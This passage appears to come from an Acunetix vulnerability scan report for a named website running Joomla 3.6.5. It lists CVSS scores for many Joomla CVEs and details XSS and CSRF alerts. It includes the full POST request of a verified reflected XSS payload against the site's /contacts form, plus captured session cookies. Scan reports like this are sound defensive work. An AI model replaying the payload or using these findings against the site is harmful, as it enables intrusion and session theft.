CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

78
Base Score: 3.5

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-17855
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core Security Bypass (1.6.0 - 3.6.5)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2017-7988
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core Security Bypass (1.6.0 - 3.9.24)

Classification

79
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-26029
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core Security Bypass (1.6.2 - 3.9.10)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

80
Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-15028
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core Security Bypass (1.7.0 - 3.9.22)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-35616
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core Security Bypass (2.5.0 - 3.8.7)

Classification

81
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Base Score: 5.4

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: Low

Base Score: 5.5

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-11323
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core Security Bypass (2.5.0 - 3.9.15)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Base Score: 6.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

82
Base Score: 6.0

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: Proof_of_concept

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-10238
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core Security Bypass (2.5.0 - 3.9.16)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 6.0

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: Proof_of_concept

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-11890
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core Security Bypass (2.5.0 - 3.9.16)

Classification

83
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-11889
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core Security Bypass (2.5.0 - 3.9.18)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

84
Base Score: 4.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-13763
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core Security Bypass (2.5.0 - 3.9.19)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Base Score: 5.4

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: Low

Base Score: 5.5

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-15699
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core Security Bypass (2.5.0 - 3.9.27)

Classification

85
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-26038
CWE CWE-284
Affected items Variation
Web Server 1

Joomla! Core Security Bypass (2.5.0 - 3.9.27)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

86
Base Score: 4.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-26037
CWE CWE-613
Affected items Variation
Web Server 1

Joomla! Core SQL Injection (1.7.0 - 3.9.15)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

Base Score: 7.4

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

Base Score: 6.5

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: Proof_of_concept

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-10243
CWE CWE-89
Affected items Variation
Web Server 1

Application error messages

Classification

87
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-209
Affected items Variation
Web Server 1

TLS/SSL certificate about to expire

Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

88
CWE CWE-298
Affected items Variation
Web Server 1

PHP Version Disclosure

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

Affected items Variation


Web Server 1

89
Alerts details


Cross site scripting

Severity High
Reported by module /Scripts/PerScheme/XSS.script

Description

Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into
a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user
input within the output it generates.

Impact

Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local
storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then
impersonate that user.

Furthermore, JavaScript can read and make arbitrary modifications to the contents of a page being displayed to a user.
Therefore, XSS in conjunction with some clever social engineering opens up a lot of possibilities for an attacker.

Recommendation

Apply context-dependent encoding and/or validation to user input rendered on a page

References

Cross-site Scripting (XSS) Attack - Acunetix (https://www.acunetix.com/websitesecurity/cross-site-scripting/)

Types of XSS - Acunetix (https://www.acunetix.com/websitesecurity/xss/)

XSS Filter Evasion Cheat Sheet (https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)

Excess XSS, a comprehensive tutorial on cross-site scripting (https://excess-xss.com/)

Cross site scripting (https://en.wikipedia.org/wiki/Cross-site_scripting )

Affected items

/contacts
Verified vulnerability
Details
URL encoded POST input form[MESSAGE] was set to 555</textarea><ScRiPt >jJHD(9676)</ScRiPt>

The input is reflected inside a <textarea> tag.


Request headers

90
POST /contacts HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: https://www.sogbci.com/

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Content-Length: 210

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive

form[CONFIRMATION]=&form[EMAIL]=testing%40example.com&form[MESSAGE]=555</textarea>
<ScRiPt%20>jJHD(9676)</ScRiPt>&form[NOM]=pHqghUme&form[SOCIETE]
[]=SOGB&form[SUJET]=1&form[TELEPHONE]=555-666-0606&form[formId]=3


Joomla! Core 3.x.x Cross-Site Request Forgery (3.0.0 - 3.9.26)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site request forgery vulnerability. Exploiting this issue may allow a remote attacker to
perform certain administrative actions and gain unauthorized access to the affected application; other attacks are also
possible. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.26 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.27 or latest

References

https://developer.joomla.org/security-centre/853-20210502-core-csrf-in-ajax-reordering-endpoint.html
(https://developer.joomla.org/security-centre/853-20210502-core-csrf-in-ajax-reordering-endpoint.html)

CVE-2021-26033 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26033)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.26 are affected.

91
Request headers
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Request Forgery (3.0.0 - 3.9.26)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site request forgery vulnerability. Exploiting this issue may allow a remote attacker to
perform certain administrative actions and gain unauthorized access to the affected application; other attacks are also
possible. Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.26 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.27 or latest

References

https://developer.joomla.org/security-centre/854-20210503-core-csrf-in-data-download-endpoints.html
(https://developer.joomla.org/security-centre/854-20210503-core-csrf-in-data-download-endpoints.html)

CVE-2021-26034 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26034)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.26 are affected.


Request headers

92
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Request Forgery (3.2.0 - 3.9.12)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site request forgery vulnerability. Exploiting this issue may allow a remote attacker to
perform certain administrative actions and gain unauthorized access to the affected application; other attacks are also
possible. Joomla! Core versions 3.x.x ranging from 3.2.0 and up to and including 3.9.12 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.13 or latest

References

https://developer.joomla.org/security-centre/794-20191001-core-csrf-in-com-template-overrides-view.html
(https://developer.joomla.org/security-centre/794-20191001-core-csrf-in-com-template-overrides-view.html)

CVE-2019-18650 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18650)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.2.0 and 3.9.12 are affected.


Request headers

93
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.8.3)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.8.3 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.4 or latest

References

https://lorexxar.cn/2018/02/07/joomla3-8-4/ (https://lorexxar.cn/2018/02/07/joomla3-8-4/)

https://developer.joomla.org/security-centre/718-20180101-core-xss-vulnerability.html
(https://developer.joomla.org/security-centre/718-20180101-core-xss-vulnerability.html)

CVE-2018-6380 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6380)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.8.3 are affected.


Request headers

94
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.11)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.11 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.12 or latest

References

https://developer.joomla.org/security-centre/791-20190901-core-xss-in-logo-parameter-of-default-templates.html
(https://developer.joomla.org/security-centre/791-20190901-core-xss-in-logo-parameter-of-default-templates.html)

CVE-2019-16725 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16725)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.11 are affected.


Request headers

95
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.15)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.15 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.16 or latest

References

https://developer.joomla.org/security-centre/803-20200302-core-xss-in-protostar-and-beez3.html
(https://developer.joomla.org/security-centre/803-20200302-core-xss-in-protostar-and-beez3.html)

CVE-2020-10242 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10242)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.15 are affected.


Request headers

96
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.18)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.18 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.19 or latest

References

https://developer.joomla.org/security-centre/813-20200601-core-xss-in-modules-heading-tag-option.html
(https://developer.joomla.org/security-centre/813-20200601-core-xss-in-modules-heading-tag-option.html)

CVE-2020-13761 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13761)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.18 are affected.


Request headers

97
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.18)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.18 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.19 or latest

References

https://developer.joomla.org/security-centre/815-20200603-core-xss-in-com-modules-tag-options
(https://developer.joomla.org/security-centre/815-20200603-core-xss-in-com-modules-tag-options)

CVE-2020-13762 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13762)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.18 are affected.


Request headers

98
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.18)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions 3.x.x ranging from 3.0.0 and up to and including 3.9.18 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.19 or latest

References

https://developer.joomla.org/security-centre/816-20200604-core-xss-in-jquery-htmlprefilter.html
(https://developer.joomla.org/security-centre/816-20200604-core-xss-in-jquery-htmlprefilter.html)

https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ (https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/)

CVE-2020-11022 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11022)

CVE-2020-11023 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11023)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 3.0.0 and 3.9.18 are affected.


Request headers

99
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

